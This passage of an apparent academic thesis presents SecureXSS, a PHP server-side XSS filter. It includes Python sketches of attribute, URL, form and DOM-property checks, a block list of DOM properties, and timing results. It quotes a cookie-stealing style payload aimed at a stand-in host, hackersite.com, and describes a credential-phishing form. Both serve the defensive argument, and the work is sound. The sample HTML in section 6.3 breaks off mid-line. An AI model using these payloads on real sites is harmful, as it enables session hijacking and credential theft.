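    The extension restriction of Table 5.2 can be illustrated with a short Python sketch (SecureXSS itself is written in PHP5, and this is not its code). The function name is_allowed_url and the dictionary layout are hypothetical, only a subset of the table's rows is encoded, and the scheme check (accepting only relative or http(s) URLs) is an added assumption that the table does not state: without it, a value such as javascript:alert(1)//x.jpg would pass an extension-only test.

```python
import posixpath
from typing import Optional, Set
from urllib.parse import urlparse

IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".xbm", ".gif", ".bmp"}
PAGE_EXTS = {".htm", ".html", ".asp", ".jsp", ".php", ".aspx"}

# Subset of Table 5.2: (tag, attribute) -> allowed extensions; "*" means any tag.
ALLOWED_EXTENSIONS = {
    ("img", "src"): IMAGE_EXTS,
    ("img", "lowsrc"): IMAGE_EXTS,
    ("img", "dynsrc"): IMAGE_EXTS,
    ("a", "href"): PAGE_EXTS | {".swf", ".rb", ".pl", ".cgi"},
    ("iframe", "src"): IMAGE_EXTS | PAGE_EXTS,
    ("bgsound", "src"): {".wav", ".mid", ".au"},
    ("script", "src"): set(),  # Table 5.2: src is not allowed on script at all
    ("*", "background"): IMAGE_EXTS,
    ("*", "longdesc"): {".txt", ".rtf", ".doc"},
}

# Assumption beyond Table 5.2: only relative or http(s) URLs are accepted.
SAFE_SCHEMES = {"", "http", "https"}


def is_allowed_url(tag: str, attr: str, value: str) -> bool:
    """Return True if `value` may stay in attribute `attr` of `tag`."""
    tag, attr = tag.lower(), attr.lower()
    allowed: Optional[Set[str]] = ALLOWED_EXTENSIONS.get((tag, attr))
    if allowed is None:
        allowed = ALLOWED_EXTENSIONS.get(("*", attr))
    if allowed is None:
        return False  # pair not covered by this subset: deny by default
    # Drop spaces and C0 control characters, which browsers may skip ("java\tscript:").
    cleaned = "".join(ch for ch in value if ch > " ")
    parsed = urlparse(cleaned)
    if parsed.scheme.lower() not in SAFE_SCHEMES:
        return False
    extension = posixpath.splitext(parsed.path)[1].lower()
    return extension in allowed
```

    Checking the path component rather than the raw string means a query string such as ?id=1 does not hide the real extension of the requested file.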

    The second type is the set of attributes that allow users to insert script directly. Allowing users to insert script directly is like leaving a bank open 24 hours a day, which makes it easy for a thief to rob it. Just as banks keep their security systems alert to protect their customers' wealth, web administrators should make sure that their security measures safeguard novice users. As an example of how these attributes can be malicious, an onload handler can open a new window every time the page is loaded and post the novice user's session cookie to the attacker's site, through which the session can be hijacked.

    The attributes in this category are: onblur, onclick, ondblclick, onfocus, onmousedown, onmousemove, onmouseout, onmouseover, onmouseup, onkeydown, onkeypress, onkeyup, onload, onunload, onabort, onchange, onreset, onselect and onsubmit.

    The third and last category of attributes allows a user to set the style of his content. The examples given for Type 1 and Type 2 attributes can be adapted to this category, for instance by placing a script where the style attribute expects a url() value.

    The only attribute that belongs to this category is style.
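    The three attribute categories can be captured as plain sets and applied to an HTML fragment with Python's standard html.parser module. This is a hypothetical sketch for illustration; the names attribute_type and AttributeClassifier are not part of SecureXSS.

```python
from html.parser import HTMLParser
from typing import List, Optional, Tuple

# The three attribute categories described in this chapter.
TYPE1_EXTERNAL = {"action", "background", "classid", "code", "data", "href", "longdesc", "src"}
TYPE2_SCRIPT = {
    "onblur", "onclick", "ondblclick", "onfocus", "onmousedown", "onmousemove",
    "onmouseout", "onmouseover", "onmouseup", "onkeydown", "onkeypress", "onkeyup",
    "onload", "onunload", "onabort", "onchange", "onreset", "onselect", "onsubmit",
}
TYPE3_STYLE = {"style"}


def attribute_type(name: str) -> Optional[int]:
    """Return 1, 2 or 3 for a vulnerable attribute, or None for any other attribute."""
    name = name.lower()
    if name in TYPE1_EXTERNAL:
        return 1
    if name in TYPE2_SCRIPT:
        return 2
    if name in TYPE3_STYLE:
        return 3
    return None


class AttributeClassifier(HTMLParser):
    """Collect (tag, attribute, type) for every vulnerable attribute in a fragment."""

    def __init__(self) -> None:
        super().__init__()
        self.found: List[Tuple[str, str, int]] = []

    def handle_starttag(self, tag, attrs):
        # html.parser already lower-cases tag and attribute names.
        for name, _value in attrs:
            kind = attribute_type(name)
            if kind is not None:
                self.found.append((tag, name, kind))
```

    Because html.parser lower-cases tag and attribute names, variants such as OnLoad are classified the same way as onload.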

    To protect novice users from XSS, we must consider four tags in addition to the attributes listed above, namely the script, base, style and form tags. The script tag can be used by an attacker to insert malicious script directly. The base tag is generally used to define the base path for references in the page; an attacker can use it to alter this path or redirect it to his own site. In the same way as the style attribute, the style tag can be used to insert malicious script. Such an example is shown below:

    background-image: url(window.open('http://hackersite.com/info.pl?captcha=' + document.cookie))

    In this example, a malicious script is given instead of the background image URL; on execution, it opens a new window and sends the user's session cookie to the hacker's site.

    To protect users from the XSS-based phishing attack explained in Section 2.6.3, we should also consider the inner text and the action attribute of the form tag. An illustration of how an attacker can use the inner text of the form tag is shown below:

    User Name:
    Password:

    The example above creates an HTML form that displays two text boxes asking for a username and password and, on submit, posts their contents to the hacker's site. If an attacker posts this message in the user forum of a banking website, an innocent user visiting the page may log in through it, which may result in a huge loss for the user. Since the inner text of the form tag can have such a serious impact, it is better to strip off any content inside the form tag. Apart from the inner text, the action attribute of the form tag can also be used by an attacker to steal the user's username and password: the attacker posts a message containing a form tag and some malicious script that replaces the page's actual form tag with the inserted one. Such a post can cause huge losses to innocent users. Hence the action attribute of the form tag should also be removed from user-posted messages.
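    Removing the action attribute and the inner text of the form tag can be sketched in Python with html.parser, re-serialising everything outside forms. FormStripper and strip_forms are hypothetical names, and re-serialising through html.parser is an assumption of this sketch, not the SecureXSS implementation (which works on the DOM produced by Simple HTML DOM Parser).

```python
from html import escape
from html.parser import HTMLParser


class FormStripper(HTMLParser):
    """Re-serialise HTML, removing form 'action' attributes and everything inside a form."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out = []
        self.form_depth = 0  # > 0 while inside a form element

    def _render(self, tag, attrs, close=""):
        parts = [f" {n}" if v is None else f' {n}="{escape(v, quote=True)}"' for n, v in attrs]
        return f"<{tag}{''.join(parts)}{close}>"

    def handle_starttag(self, tag, attrs):
        if self.form_depth:  # inside a form: drop the tag
            if tag == "form":
                self.form_depth += 1
            return
        if tag == "form":
            self.form_depth = 1
            attrs = [(n, v) for n, v in attrs if n != "action"]
        self.out.append(self._render(tag, attrs))

    def handle_startendtag(self, tag, attrs):
        if tag == "form":
            self.handle_starttag(tag, attrs)  # browsers treat <form/> as an opening tag
        elif not self.form_depth:
            self.out.append(self._render(tag, attrs, close=" /"))

    def handle_endtag(self, tag):
        if self.form_depth:
            if tag == "form":
                self.form_depth -= 1
                if self.form_depth == 0:
                    self.out.append("</form>")
            return
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.form_depth:  # inner text of a form is discarded
            self.out.append(escape(data, quote=False))


def strip_forms(text: str) -> str:
    stripper = FormStripper()
    stripper.feed(text)
    stripper.close()
    return "".join(stripper.out)
```

    A self-closing form tag is handled like an opening tag, as browsers do, so it cannot be used to carry an action attribute past the filter.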

    Having established that the above tags and attributes allow an attacker to insert scripts into a web application, and that not every inserted script is XSS, the next step is to find out what sort of scripts make XSS possible.

    A script that causes harm is an attack. In the case of web applications, the harm to users can be session hijacking, denial of service, phishing or alteration of the page content. By stealing a user's session cookie, an attacker can hijack the legitimate user's session. Denial of service can be achieved in many ways, such as preventing the user from visiting the page he wants by changing the page location, or by throwing alerts endlessly. Phishing can be done by creating or editing the forms on the web page.

    With the problem narrowed down to these possibilities, it is no longer difficult to find out what sort of scripts cause such issues for a novice user. Our work on identifying malicious scripts resulted in restricting access to a set of DOM properties. Table 5.3 shows the DOM properties that no attacker should be allowed to access, in order to protect the legitimate user.

    Table 5.3: DOM properties which can cause XSS attacks

    DOM property | Reason
    document.cookie | Used to steal the innocent user's session.
    document.location, location.href, location.replace, location.reload, window.location, window.location.reload(), window.top.location, location.assign, window.self.location, document.reload | Used to change the document location and mount a denial-of-service attack.
    window.history, history.forward, history.go, history.back | Used to access the history of the browser window and keep showing pages from it, so that the user cannot reach the page he wants to visit.
    document.write, document.writeln | Used by an attacker to edit the page content.
    document.title | Used to change the title of the page.
    window.status, window.defaultStatus | Used to change the status-bar text of the page and create panic for the legitimate user.
    document.getElementById, document.getElementsByName, document.getElementsByTagName | Used to set the values of tag attributes in the page.
    document.anchors, document.forms, document.frames, document.images, document.links, window.frames | Used to set values for the corresponding tags in the page.

    To protect legitimate users from an attacker, we should find every occurrence of the properties listed above, both in the attributes shown in Table 5.1 and in the inner text of the script and style tags, and strip it off.

    If all malicious scripts are successfully stripped at every location listed above, novice users are protected from malignant XSS.
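    The check against Table 5.3 can be sketched as a normalise-then-search step. The normalisation used here (decoding HTML character references, removing whitespace and lower-casing) is an assumption chosen for illustration, since the exact normalisation is not specified in this chapter; FORBIDDEN_DOM_PROPERTIES and find_forbidden are hypothetical names.

```python
import html
import re

# DOM properties and methods from Table 5.3, written in lower case for matching.
FORBIDDEN_DOM_PROPERTIES = (
    "document.cookie",
    "document.location", "location.href", "location.replace", "location.reload",
    "window.location", "window.top.location", "location.assign",
    "window.self.location", "document.reload",
    "window.history", "history.forward", "history.go", "history.back",
    "document.write",  # also matches document.writeln
    "document.title",
    "window.status", "window.defaultstatus",
    "document.getelementbyid", "document.getelementsbyname",
    "document.getelementsbytagname",
    "document.anchors", "document.forms", "document.frames",
    "document.images", "document.links", "window.frames",
)


def normalize(value: str) -> str:
    """Decode HTML character references, remove all whitespace and lower-case."""
    return re.sub(r"\s+", "", html.unescape(value)).lower()


def find_forbidden(value: str) -> list:
    """Return the Table 5.3 entries that occur in the normalised value."""
    normalized = normalize(value)
    return [prop for prop in FORBIDDEN_DOM_PROPERTIES if prop in normalized]
```

    A harmless handler such as alert('Hello, world') yields an empty list, while alert(document&#46;cookie) is caught after normalisation. Plain substring matching is still easy to evade, for example with bracket notation such as document['cookie'] or string concatenation, so the sketch illustrates the idea rather than a complete defence.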

    CHAPTER 6

    IMPLEMENTATION DETAILS AND EXPERIMENTAL RESULTS

    As explained in Chapter 4, our solution should not burden the lay user (a user without a technical background) with extra configuration or installation at the browser end, and the user should enjoy secure browsing with no loss of functionality. Building on the challenges identified and the solution proposed in Chapter 5, our goal is to implement a server-side API that is fast, does not weigh down the web server, and places minimal burden on web developers and administrators.

    This chapter covers the procedure of the solution, its implementation details, the working of the solution, the results and, finally, a comparison of our solution with other existing solutions (with respect to execution time, not functionality).

    6.1 Procedure

    The abstract description of the solution in Chapter 5 may not be enough for the reader to understand it, so the core of the solution is presented in this section.

    Algorithm 6.1 (High-level algorithm describing the procedure of SecureXSS)

    Input: Input given by user (can be plain text or HTML or script)

    Output: XSS free user input (Filtered user message)

    1. Generate the DOM for all the tags in the user-given input.

    2. Find all occurrences of script attributes (the Type 2 attributes explained in Chapter 5).

    3. For each occurrence found in step 2, normalize the attribute value and validate it.

    4. Restrict the values of Type 1 attributes as defined in Table 5.2.

    5. Find all occurrences of the script tag, remove the src attribute if set, and normalize and validate the inner text of the script tag.

    6. Find all occurrences of the style attribute, and normalize and validate them.

    7. Find all occurrences of the style tag, and normalize and validate their inner text.

    8. Find all occurrences of the form tag, remove the action attribute if set, and strip off the inner text of the form tag.

    9. Remove the attributes that failed validation in steps 3 through 8.

    10. Return the XSS-free output.
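    Algorithm 6.1 can be approximated end to end in Python as follows. This is a hypothetical sketch, not the PHP5 SecureXSS code: it uses html.parser in place of Simple HTML DOM Parser, abbreviated versions of Tables 5.2 and 5.3, treats every on* attribute as a Type 2 attribute, keeps only image-valued img src among Type 1 attributes, and omits the stripping of form inner text in step 8.

```python
import html
import re
from html.parser import HTMLParser

# Abbreviated lists for brevity; Tables 5.2 and 5.3 give the full sets.
FORBIDDEN = ("document.cookie", "document.location", "window.location", "location.href",
             "document.write", "history.go", "history.back", "document.forms")
TYPE1 = {"action", "background", "classid", "code", "data", "href", "longdesc", "src"}
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".xbm", ".gif", ".bmp")


def normalize(value: str) -> str:
    """Assumed normalisation for step 3: decode entities, drop whitespace, lower-case."""
    return re.sub(r"\s+", "", html.unescape(value)).lower()


def is_clean(value: str) -> bool:
    return not any(prop in normalize(value) for prop in FORBIDDEN)


def keep_attribute(tag: str, name: str, value: str) -> bool:
    if name.startswith("on") or name == "style":  # steps 2, 3 and 6 (any on* attribute)
        return is_clean(value)
    if name in TYPE1:  # steps 4, 5 and 8
        # Simplification: only <img src> pointing at an image survives; script src,
        # form action and all other Type 1 attributes are dropped outright.
        if tag != "img" or name != "src":
            return False
        url = normalize(value)
        scheme_ok = url.startswith(("http://", "https://")) or ":" not in url
        return scheme_ok and url.endswith(IMAGE_EXTS)
    return True  # ordinary attributes such as alt or title


class SecureXSSSketch(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out = []
        self.current = None  # name of the most recently opened tag

    def handle_starttag(self, tag, attrs):
        self.current = tag
        kept = "".join(
            f' {name}="{html.escape(value or "", quote=True)}"'
            for name, value in attrs
            if keep_attribute(tag, name, value or "")  # step 9: drop failed attributes
        )
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        self.current = None
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if self.current in ("script", "style"):  # steps 5 and 7: validate inner text
            if is_clean(data):
                self.out.append(data)
        else:
            self.out.append(html.escape(data, quote=False))


def filter_input(text: str) -> str:
    """Steps 1 and 10: parse the input and return the filtered markup."""
    parser = SecureXSSSketch()
    parser.feed(text)
    parser.close()
    return "".join(parser.out)
```

    For example, filtering an img tag with src="photo.jpg", an onload handler that reads document.cookie, and alt="x" keeps the image and its alt text but drops the handler, while a harmless onclick="alert('hi')" is kept; this reflects the aim of separating simple scripts from XSS rather than removing all script.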

    6.2 Implementation Details

    Building on the procedure given above, this section presents the implementation details of the SecureXSS API. SecureXSS is a server-side XSS filtering API developed in PHP5. To generate the DOM for the user-given input, we use Simple HTML DOM Parser [HDP], an open-source API written in PHP.

    The current version of SecureXSS is a model API, developed in PHP5 to ease the web developer's job and thereby provide secure browsing for innocent users. The model was developed to demonstrate the correctness of the solution; interested web developers are free to port it to other server-side technologies (such as ASP or JSP).

    As stated above, our implementation uses Simple HTML DOM Parser (since we found it to work better than other DOM parsers) to parse the user input and generate its DOM. The current implementation of the API is tied to Simple HTML DOM Parser, so users who wish to use another DOM parser may have to adapt the API accordingly. Once the DOM tree is generated for all tags in the user-given input, steps 2 to 9 of the procedure remain the same.

    6.3 Working of SecureXSS

    SecureXSS is a server-side XSS filtering API that takes possibly malicious user input, validates it, and returns the non-malicious part. Its usage is illustrated in Figure 6.1. When a user sends a POST request to the web server, the server instantiates the API and forwards the user input to it. The API validates the input, strips all malicious content, and returns the non-malicious content to the server, which then processes the operation requested by the user.

    Figure 6.1: Server-side XSS Filtering API

    The steps shown in Figure 6.1 are:

    1. The client sends a POST request to the web server.

    2. The web server passes the request to the SecureXSS API.

    3. SecureXSS returns the non-malicious user request.

    4. The web server stores the user post in the database, or otherwise processes the request.
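    The request flow of Figure 6.1 can be sketched as a minimal Python WSGI application. The function make_app, the form field name message, and the in-memory list standing in for the database are all hypothetical; sanitize stands for any filtering function, such as a port of SecureXSS.

```python
from typing import Callable, List
from urllib.parse import parse_qs


def make_app(sanitize: Callable[[str], str], store: List[str]):
    """Hypothetical WSGI app following Figure 6.1: filter every posted message before storing it."""

    def app(environ, start_response):
        # Step 1: the client sends a POST request to the web server.
        if environ.get("REQUEST_METHOD") != "POST":
            start_response("405 Method Not Allowed", [("Content-Type", "text/plain")])
            return [b"POST only"]
        length = int(environ.get("CONTENT_LENGTH") or 0)
        body = environ["wsgi.input"].read(length).decode("utf-8")
        message = parse_qs(body).get("message", [""])[0]
        # Steps 2 and 3: hand the raw input to the filter and receive the filtered text.
        clean = sanitize(message)
        # Step 4: store the filtered post (a list stands in for the database).
        store.append(clean)
        start_response("200 OK", [("Content-Type", "text/plain")])
        return [b"stored"]

    return app
```

    For a local trial, the app can be served with wsgiref.simple_server.make_server('', 8000, make_app(sanitize, posts)).serve_forever(). Keeping the filter behind a single callable mirrors the design goal of this chapter: the web developer adds one call before storing user input, and nothing changes at the browser end.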

    We now illustrate the working of the solution on the sample HTML shown below.

    document.write("

    6.4 Results

    Security mechanisms cannot be tested comprehensively, because it is impossible to prove a negative: there is no way of knowing whether the set of all publicly known attacks, which can be turned into test cases, equals the set of all possible attacks. We tested SecureXSS with a set of 200 vectors gathered from recognized knowledge bases [RSN] [W3S], with 100% effectiveness (shown in Appendix II). Of these 200 vectors, 100 are malicious XSS attacks and the other 100 are non-malicious scripts (as explained in Chapter 4).

    Running time was also an important consideration, given the importance of availability and response time for enterprise applications. For the timing tests, we collected a set of 350 web pages from popular sites such as http://news.yahoo.com/, http://news.google.com/ and http://msdn.microsoft.com/. The results of our timing (overhead) tests are shown in Table 6.1.

    Table 6.1: SecureXSS timing test (overhead) results

    Size of HTML (KB) | Average execution time (s)
    10-30 | 0.095048352
    31-60 | 0.182305614
    61-90 | 0.234215016
    91-120 | 0.269700872

    These results are plotted in Figure 6.2, with the size of the HTML on the X-axis and the execution time on the Y-axis. All measurements were taken on an Intel Core 2 Duo 3.0 GHz system with 2 GB RAM, running Windows XP Professional SP2 with the XAMPP web server.

    Figure 6.2: SecureXSS overhead on the server (X-axis: size of HTML; Y-axis: execution time)

    The results were also compared with those of another popular XSS filtering API, HTML Purifier, as shown in Appendix III. Since HTML Purifier has been compared with the other existing solutions in [HTP], this comparison suggests that SecureXSS performs well, in terms of execution time, relative to existing server-side XSS filtering APIs.

    CHAPTER 7

    CONCLUSIONS

    The Internet has revolutionized many aspects of human life, such as the way people communicate and do business. However, users' trust in web applications and their experience of them are not fully satisfactory, owing to the plethora of security breaches that occur frequently in critical applications such as banking and threaten the privacy of legitimate customers' details. This project helps increase the security of web applications, thereby enhancing end customers' trust in these applications and providing a better online experience.

    This project addresses one of the most critical issues faced by today's web users: the Cross-site Scripting (XSS) attack, ranked first in the OWASP Top 10 2007 [OWA]. Its main goal was to build a server-side XSS filtering API that differentiates simple scripts from malevolent XSS, with execution time as an additional consideration. Since no existing server-side XSS API differentiates simple scripts from XSS, we proposed an approach for doing so, and developed an open-source server-side XSS filtering model API, SecureXSS (pronounced "Secure Excess"), which differentiates simple scripts from malignant XSS.

    Scope for Future Work

    The developed model API works well in stripping out genuine XSS (including XSS worms and viruses), but it is restricted to PHP, the language in which it is developed. The same logic can be extended to other server-side scripting technologies (such as ASP and JSP), so that all classes of web developers can use the solution.

    REFERENCES

    [OWA] OWASP Top 10 2007: The Ten Most Critical Web Application Security Vulnerabilities, http://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf, Last Accessed: July 7, 2009.

    [CER] CERT Advisory CA-2000-02: Malicious HTML Tags Embedded in Client Web Requests, February 2000.

    [XSS] Cross-site Scripting (XSS), www.owasp.org/index.php/Cross_site_scripting, Last Accessed: July 7, 2009.

    [USC] US-CERT. eBay contains a cross-site scripting vulnerability. http://www.kb.cert.org/vuls/id/808921, 2006.

    [KLE] Amit Klein. DOM Based Cross Site Scripting or XSS of the Third Kind. http://www.webappsec.org/projects/articles/071105.shtml, 2005.

    [PEW] Pew Internet & American Life Project. Report: Spam and Phishing. http://www.pewinternet.org, 2005.

    [STA] Ed Stansel. Don't Get Caught by Online Phishers Angling for Account Information. Florida Times-Union, 1997.

    [OLL] Gunter Ollmann. The Phishing Guide: Understanding & Preventing Phishing Attacks. NGSSoftware Insight Security Research, 2004.

    [RRO] Martin Johns, Justus Winter. RequestRodeo: Client Side Protection against Session Riding. In OWASP AppSec 2006 Europe, 2006.

    [ROB] Robert Auger. The Cross-Site Request Forgery (CSRF/XSRF) FAQ. http://www.cgisecurity.com/csrf-faq.html, April 2008.

    [CSRF] Jesse Burns. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness. 2007.

    [JEG] Jeremiah Grossman, Robert "RSnake" Hansen, Petko "pdp" D. Petkov, Anton Rager, Seth Fogie. XSS Attacks: Cross Site Scripting Exploits and Defense. Syngress Publishing, Inc., ISBN-13: 978-1-59749-154-9.

    [BBC] BBCode, http://en.wikipedia.org/wiki/BBCode, Last Accessed: July 7, 2009.

    [WIT] Wikitext, http://en.wikipedia.org/wiki/Wikitext, Last Accessed: July 7, 2009.

    [MAD] Markdown, http://daringfireball.net/projects/markdown/, Last Accessed: July 7, 2009.

    [TEX] Textile, http://textism.com/tools/textile/, Last Accessed: July 7, 2009.

    [STT] strip_tags (PHP Manual), http://php.net/manual/en/function.strip-tags.php, Last Accessed: July 8, 2009.

    [PIF] PHP Input Filter, www.phpclasses.org/browse/package/2189.html#download, Last Accessed: July 8, 2009.

    [HTS] HTML_Safe, http://pear.php.net/package/HTML_Safe/, Last Accessed: July 8, 2009.

    [KSS] Kses, http://sourceforge.net/projects/kses/, Last Accessed: July 8, 2009.

    [HTL] htmLawed, www.bioinformatics.org/phplabware/internal_utilities/htmLawed/index.php, Last Accessed: July 8, 2009.

    [SHC] Safe HTML Checker, http://simonwillison.net/2003/Feb/23/safeHtmlChecker/, Last Accessed: July 8, 2009.

    [HTP] HTML Purifier, http://htmlpurifier.org/, Last Accessed: July 8, 2009.

    [ANT] Arshan Dabirsiaghi. Towards Automated Malicious Code Detection and Removal on the Web. Open Web Application Security Project, Aspect Security, Inc., 2007.

    [GEL] Security issues in Kses (Geeklog), http://www.geeklog.net/article.php/kses, Last Accessed: July 16, 2009.

    [HTM] htmLawed, http://drupal.org/project/htmLawed, Last Accessed: July 16, 2009.

    [HDP] PHP Simple HTML DOM Parser, http://simplehtmldom.sourceforge.net/, Last Accessed: July 20, 2009.

    [RSN] XSS (Cross-site Scripting) Cheat Sheet, http://ha.ckers.org/xss.html, Last Accessed: July 24, 2009.

    [W3S] W3Schools, http://www.w3schools.com, Last Accessed: July 24, 2009.

    APPENDIX I

    OWASP THE TEN MOST CRITICAL WEB APPLICATION SECURITY VULNERABILITIES

    The Open Web Application Security Project (OWASP) (www.owasp.org) is a worldwide

    free and open community focused on improving the security of application software. OWASP’s

    mission is to make application security visible, so that people and organizations can make

    informed decisions about true application security risks.

    The primary aim of the OWASP Top 10 is to educate developers, designers, architects and organizations about the consequences of the most common web application security vulnerabilities. It is based on the MITRE vulnerability trends data (explained in http://cwe.mitre.org/documents/vuln-trends/index.html), from which the top ten vulnerabilities are distilled. The ranks of the vulnerabilities are as follows:

    Figure 1: MITRE data on Top 10 web application vulnerabilities for 2006

    [OWA] discusses each vulnerability in detail, along with the measures to be taken to protect an application against it. It is assumed, however, that the most common vulnerabilities, such as unvalidated input, buffer overflows, integer overflows and format string issues, denial of service, and insecure configuration management, are already taken care of in web applications. The following table briefly describes the top 10 web application vulnerabilities listed in the OWASP Top 10 2007 [OWA].

    Table 1: OWASP Top 10 Web Application Vulnerabilities

    Vulnerability Description

    A1 – Cross Site Scripting (XSS)

    XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim’s browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.

    A2 – Injection Flaws

    Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker’s hostile data tricks the interpreter into executing unintended commands or changing data.

    A3 – Malicious File Execution

    Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile